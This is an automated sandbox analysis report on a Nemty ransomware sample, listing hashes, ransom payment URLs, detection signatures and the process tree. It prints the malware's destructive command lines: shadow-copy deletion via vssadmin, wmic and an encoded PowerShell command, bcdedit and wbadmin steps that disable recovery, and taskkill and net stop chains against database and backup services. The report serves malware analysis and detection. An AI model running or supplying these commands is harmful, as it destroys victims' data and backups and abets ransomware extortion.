Analysis
- max time kernel: 120s
- max time network: 120s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 01-02-2022 07:18
Static task: static1
Behavioral task: behavioral1
- Sample: 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
- Resource: win10v2004-en-20220113
General
- Target: 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
- Size: 87KB
- MD5: c96613c857018555f3a5bc227567e6e7
- SHA1: a402f5e46c8e056c9e9494f7e83902e0fcae3a61
- SHA256: 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3
- SHA512: 086fa536e03882efe6eb79a6f56d954205e00c37885f5d23f8eae47702125d7fed2a8c76d6d2e01d6eeb175f273185844a6494847bef2f0f805560867f075c41
Malware Config
Extracted
- C:\NEMTY_YX2KTOA-DECRYPT.txt
- nemty
- http://nemty.top/public/pay.php
- http://zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion/public/pay.php
Signatures
- Nemty
  Ransomware discovered in late 2019 which has been actively developed/updated over time.
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies extensions of user files (8 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes (description, ioc; all entries from 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe):
  - File renamed: C:\Users\Admin\Pictures\CompressRepair.raw => C:\Users\Admin\Pictures\CompressRepair.raw.NEMTY_YX2KTOA
  - File opened for modification: C:\Users\Admin\Pictures\InvokeSelect.tiff
  - File renamed: C:\Users\Admin\Pictures\InvokeSelect.tiff => C:\Users\Admin\Pictures\InvokeSelect.tiff.NEMTY_YX2KTOA
  - File renamed: C:\Users\Admin\Pictures\RestorePublish.png => C:\Users\Admin\Pictures\RestorePublish.png.NEMTY_YX2KTOA
  - File renamed: C:\Users\Admin\Pictures\UnlockEnter.tif => C:\Users\Admin\Pictures\UnlockEnter.tif.NEMTY_YX2KTOA
  - File renamed: C:\Users\Admin\Pictures\UnpublishEnter.png => C:\Users\Admin\Pictures\UnpublishEnter.png.NEMTY_YX2KTOA
  - File renamed: C:\Users\Admin\Pictures\BlockDisable.tif => C:\Users\Admin\Pictures\BlockDisable.tif.NEMTY_YX2KTOA
  - File renamed: C:\Users\Admin\Pictures\BlockUnpublish.raw => C:\Users\Admin\Pictures\BlockUnpublish.raw.NEMTY_YX2KTOA
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes (flow, ioc):
  - flow 4: api.ipify.org
  - flow 6: api.db-ip.com
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Interacts with shadow copies (2 TTPs, 2 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes (pid, process):
  - 560 vssadmin.exe
  - 1132 vssadmin.exe
- Kills process with taskkill (14 IoCs)
  Processes (pid, process):
  - 1616 taskkill.exe
  - 584 taskkill.exe
  - 1072 taskkill.exe
  - 1296 taskkill.exe
  - 976 taskkill.exe
  - 1524 taskkill.exe
  - 924 taskkill.exe
  - 1844 taskkill.exe
  - 1760 taskkill.exe
  - 532 taskkill.exe
  - 2008 taskkill.exe
  - 1868 taskkill.exe
  - 2000 taskkill.exe
  - 1708 taskkill.exe
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes (pid, process):
  - 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
  - 1764 powershell.exe
- Suspicious use of AdjustPrivilegeToken (58 IoCs)
  Processes (description, pid, process), grouped by process:
  - 1400 vssvc.exe: Token: SeBackupPrivilege; Token: SeRestorePrivilege; Token: SeAuditPrivilege
  - 1716 WMIC.exe (the following 20-token sequence is recorded twice in the report): Token: SeIncreaseQuotaPrivilege; Token: SeSecurityPrivilege; Token: SeTakeOwnershipPrivilege; Token: SeLoadDriverPrivilege; Token: SeSystemProfilePrivilege; Token: SeSystemtimePrivilege; Token: SeProfSingleProcessPrivilege; Token: SeIncBasePriorityPrivilege; Token: SeCreatePagefilePrivilege; Token: SeBackupPrivilege; Token: SeRestorePrivilege; Token: SeShutdownPrivilege; Token: SeDebugPrivilege; Token: SeSystemEnvironmentPrivilege; Token: SeRemoteShutdownPrivilege; Token: SeUndockPrivilege; Token: SeManageVolumePrivilege; Token: 33; Token: 34; Token: 35
  - 1760 taskkill.exe: Token: SeDebugPrivilege
  - 532 taskkill.exe: Token: SeDebugPrivilege
  - 2008 taskkill.exe: Token: SeDebugPrivilege
  - 1616 taskkill.exe: Token: SeDebugPrivilege
  - 1868 taskkill.exe: Token: SeDebugPrivilege
  - 584 taskkill.exe: Token: SeDebugPrivilege
  - 1524 taskkill.exe: Token: SeDebugPrivilege
  - 2000 taskkill.exe: Token: SeDebugPrivilege
  - 924 taskkill.exe: Token: SeDebugPrivilege
  - 1072 taskkill.exe: Token: SeDebugPrivilege
  - 1708 taskkill.exe: Token: SeDebugPrivilege
  - 1296 taskkill.exe: Token: SeDebugPrivilege
  - 976 taskkill.exe: Token: SeDebugPrivilege
  - 1844 taskkill.exe: Token: SeDebugPrivilege
  - 1764 powershell.exe: Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (description, pid, process, target process); each entry below is recorded 4 times in the report:
  - PID 1388 wrote to memory of 1668 (4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe -> cmd.exe)
  - PID 1388 wrote to memory of 584 (4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe -> cmd.exe)
  - PID 584 wrote to memory of 560 (cmd.exe -> vssadmin.exe)
  - PID 1668 wrote to memory of 1132 (cmd.exe -> vssadmin.exe)
  - PID 1388 wrote to memory of 1312 (4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe -> cmd.exe)
  - PID 1388 wrote to memory of 1552 (4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe -> cmd.exe)
  - PID 1388 wrote to memory of 980 (4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe -> cmd.exe)
  - PID 1552 wrote to memory of 1708 (cmd.exe -> net.exe)
  - PID 1312 wrote to memory of 1760 (cmd.exe -> taskkill.exe)
  - PID 1388 wrote to memory of 1764 (4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe -> powershell.exe)
  - PID 980 wrote to memory of 1716 (cmd.exe -> WMIC.exe)
  - PID 1708 wrote to memory of 2008 (net.exe -> net1.exe)
  - PID 1552 wrote to memory of 704 (cmd.exe -> net.exe)
  - PID 704 wrote to memory of 1020 (net.exe -> net1.exe)
  - PID 1552 wrote to memory of 604 (cmd.exe -> net.exe)
  - PID 604 wrote to memory of 1732 (net.exe -> net1.exe)
Processes (nested by process-tree depth; each entry gives the image path, the command line, and the signatures triggered)
- C:\Users\Admin\AppData\Local\Temp\4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe"
  signatures: Modifies extensions of user files; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe
    cmdline: "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\vssadmin.exe
      cmdline: vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
      signatures: Interacts with shadow copies
  - C:\Windows\SysWOW64\cmd.exe
    cmdline: "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\vssadmin.exe
      cmdline: vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
      signatures: Interacts with shadow copies
  - C:\Windows\SysWOW64\cmd.exe
    cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im sql.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im winword.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im wordpad.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im outlook.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im thunderbird.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im oracle.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im excel.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im onenote.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im virtualboxvm.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im node.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im QBW32.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im WBGX.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im Teams.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im Flow.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe
    cmdline: "C:\Windows\System32\cmd.exe" /c net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net.exe
      cmdline: net stop DbxSvc
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop DbxSvc
    - C:\Windows\SysWOW64\net.exe
      cmdline: net stop OracleXETNSListener
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop OracleXETNSListener
    - C:\Windows\SysWOW64\net.exe
      cmdline: net stop OracleServiceXE
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop OracleServiceXE
    - C:\Windows\SysWOW64\net.exe
      cmdline: net stop AcrSch2Svc
      - C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop AcrSch2Svc
    - C:\Windows\SysWOW64\net.exe
      cmdline: net stop AcronisAgent
      - C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop AcronisAgent
    - C:\Windows\SysWOW64\net.exe
      cmdline: net stop Apache2.4
      - C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop Apache2.4
    - C:\Windows\SysWOW64\net.exe
      cmdline: net stop SQLWriter
      - C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop SQLWriter
    - C:\Windows\SysWOW64\net.exe
      cmdline: net stop MSSQL$SQLEXPRESS
      - C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS
    - C:\Windows\SysWOW64\net.exe
      cmdline: net stop MSSQLServerADHelper100
      - C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop MSSQLServerADHelper100
    - C:\Windows\SysWOW64\net.exe
      cmdline: net stop MongoDB
      - C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop MongoDB
    - C:\Windows\SysWOW64\net.exe
      cmdline: net stop SQLAgent$SQLEXPRESS
      - C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS
    - C:\Windows\SysWOW64\net.exe
      cmdline: net stop SQLBrowser
      - C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop SQLBrowser
    - C:\Windows\SysWOW64\net.exe
      cmdline: net stop CobianBackup11
      - C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop CobianBackup11
    - C:\Windows\SysWOW64\net.exe
      cmdline: net stop cbVSCService11
      - C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop cbVSCService11
    - C:\Windows\SysWOW64\net.exe
      cmdline: net stop QBCFMontorService
      - C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop QBCFMontorService
    - C:\Windows\SysWOW64\net.exe
      cmdline: net stop QBVSS
      - C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop QBVSS
  - C:\Windows\SysWOW64\cmd.exe
    cmdline: "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic shadowcopy delete
      signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();})
    signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe
    cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\NEMTY_YX2KTOA-DECRYPT.txt"
    - C:\Windows\SysWOW64\NOTEPAD.EXE
      cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\NEMTY_YX2KTOA-DECRYPT.txt
- C:\Windows\system32\vssvc.exe
  cmdline: C:\Windows\system32\vssvc.exe
  signatures: Suspicious use of AdjustPrivilegeToken
Downloads
- C:\Users\Admin\NEMTY_YX2KTOA-DECRYPT.txt
  MD5: b53382d266be823202fe3b7a7edc1d3b
  SHA1: 7017a065a772711d21c0bbb4b1c5c8f464768e53
  SHA256: ff5dd9106b57ead90860c15083585c5925cb16865c5038d60dd5a9d89e1ba384
  SHA512: 7a1599daf22ba8638e854c1029bf3ed45978424764ff1ee87fb48e1aeb6ec5f55b5dcb6ba9fddeae3b4425543f01a27de9b4ac3e36d6125fff66182ba790be2a
- memory/1388-55-0x00000000758A1000-0x00000000758A3000-memory.dmp
  Filesize: 8KB
- memory/1764-57-0x0000000002370000-0x0000000002FBA000-memory.dmp
  Filesize: 12.3MB
- memory/1764-58-0x0000000002370000-0x0000000002FBA000-memory.dmp
  Filesize: 12.3MB